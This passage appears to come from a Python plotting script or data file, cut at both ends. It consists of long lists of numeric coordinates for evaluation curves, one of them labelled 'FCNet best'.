0.3958333333333333, 0.3958333333333333, 0.4166666666666667, 0.4166666666666667, 
0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4166666666666667, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4791666666666667, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5208333333333334, 0.5208333333333334, 0.5416666666666666, 0.5416666666666666, 0.5416666666666666, 0.5416666666666666, 0.5416666666666666, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5625, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.5833333333333334, 0.6041666666666666, 0.6041666666666666, 0.6041666666666666, 0.6041666666666666, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.6458333333333334, 0.6458333333333334, 0.6458333333333334, 0.6458333333333334, 0.6458333333333334, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 
0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.6875, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7291666666666666, 0.7291666666666666, 0.7291666666666666, 0.7291666666666666, 0.7291666666666666, 0.7291666666666666, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.7708333333333334, 0.7708333333333334, 0.7708333333333334, 0.7708333333333334, 0.7916666666666666, 0.7916666666666666, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8125, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 
0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8541666666666666, 0.8541666666666666, 0.8541666666666666, 0.8541666666666666, 0.8541666666666666, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334, 0.8958333333333334] , [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 
0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.013888888888888888, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.027777777777777776, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.05555555555555555, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.06944444444444445, 0.08333333333333333, 0.09722222222222222, 
0.1111111111111111, 0.1111111111111111, 0.1111111111111111, 0.1111111111111111, 0.1111111111111111, 0.1111111111111111, 0.125, 0.125, 0.125, 0.125, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1388888888888889, 0.1527777777777778, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.18055555555555555, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.19444444444444445, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.2361111111111111, 0.2361111111111111, 0.25, 0.2638888888888889, 0.2638888888888889, 0.2638888888888889, 0.2638888888888889, 0.2638888888888889, 0.2777777777777778, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.3055555555555556, 0.3055555555555556, 0.3055555555555556, 0.3055555555555556, 0.3055555555555556, 0.3194444444444444, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3472222222222222, 0.3611111111111111, 0.3611111111111111, 0.3611111111111111, 0.3611111111111111, 0.3611111111111111, 0.3611111111111111, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 
0.3888888888888889, 0.3888888888888889, 0.3888888888888889, 0.3888888888888889, 0.3888888888888889, 0.4027777777777778, 0.4027777777777778, 0.4027777777777778, 0.4166666666666667, 0.4166666666666667, 0.4305555555555556, 0.4444444444444444, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4583333333333333, 0.4861111111111111, 0.4861111111111111, 0.4861111111111111, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5138888888888888, 0.5416666666666666, 0.5416666666666666, 0.5416666666666666, 0.5555555555555556, 0.5555555555555556, 0.5555555555555556, 0.5555555555555556, 0.5555555555555556, 0.5555555555555556, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5694444444444444, 0.5833333333333334, 0.5833333333333334, 0.5972222222222222, 0.5972222222222222, 0.5972222222222222, 0.5972222222222222, 0.5972222222222222, 0.5972222222222222, 0.6111111111111112, 0.6111111111111112, 0.6111111111111112, 0.625, 0.625, 0.625, 0.625, 0.625, 0.6388888888888888, 0.6388888888888888, 0.6527777777777778, 0.6527777777777778, 0.6527777777777778, 0.6527777777777778, 0.6527777777777778, 0.6527777777777778, 0.6666666666666666, 0.6666666666666666, 0.6666666666666666, 0.6805555555555556, 0.6805555555555556, 0.6805555555555556, 0.6805555555555556, 0.6805555555555556, 0.6805555555555556, 0.6944444444444444, 0.6944444444444444, 0.6944444444444444, 0.6944444444444444, 0.6944444444444444, 0.6944444444444444, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7083333333333334, 0.7222222222222222, 0.7222222222222222, 0.7361111111111112, 0.7361111111111112, 0.7361111111111112, 0.75, 0.75, 0.75, 0.75, 0.7638888888888888, 0.7638888888888888, 0.7638888888888888, 0.7638888888888888, 
0.7916666666666666, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8055555555555556, 0.8194444444444444, 0.8333333333333334, 0.8333333333333334, 0.8333333333333334, 0.8472222222222222, 0.8611111111111112, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.875, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.8888888888888888, 0.9027777777777778, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9166666666666666, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 
0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9305555555555556, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9444444444444444, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9583333333333334, 0.9722222222222222, 0.9861111111111112, 0.9861111111111112, 
0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 0.9861111111111112, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0] # FCNet best x3, y3 = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9821428571428571, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9642857142857143, 0.9464285714285714, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9285714285714286, 0.9107142857142857, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.8928571428571429, 0.875, 0.875, 0.875, 0.875, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8571428571428571, 0.8392857142857143, 0.8214285714285714, 0.8214285714285714, 0.8214285714285714, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 
0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.8035714285714286, 0.7857142857142857, 0.7857142857142857, 0.7857142857142857, 0.7678571428571429, 0.7678571428571429, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.7321428571428571, 0.7321428571428571, 0.6964285714285714, 0.6964285714285714, 0.6964285714285714, 0.6964285714285714, 0.6785714285714286, 0.6785714285714286, 0.6607142857142857, 0.6607142857142857, 0.6607142857142857, 0.6607142857142857, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.6428571428571429, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.625, 0.6071428571428571, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5892857142857143, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5714285714285714, 0.5535714285714286, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5357142857142857, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5178571428571429, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 
0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.48214285714285715, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.4642857142857143, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.44642857142857145, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.42857142857142855, 0.4107142857142857, 0.4107142857142857, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.39285714285714285, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.375, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.35714285714285715, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 
0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.3392857142857143, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.30357142857142855, 0.2857142857142857, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.26785714285714285, 0.25, 0.25, 0.25, 0.25, 0.25, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 
0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.23214285714285715, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.21428571428571427, 0.19642857142857142, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 0.17857142857142858, 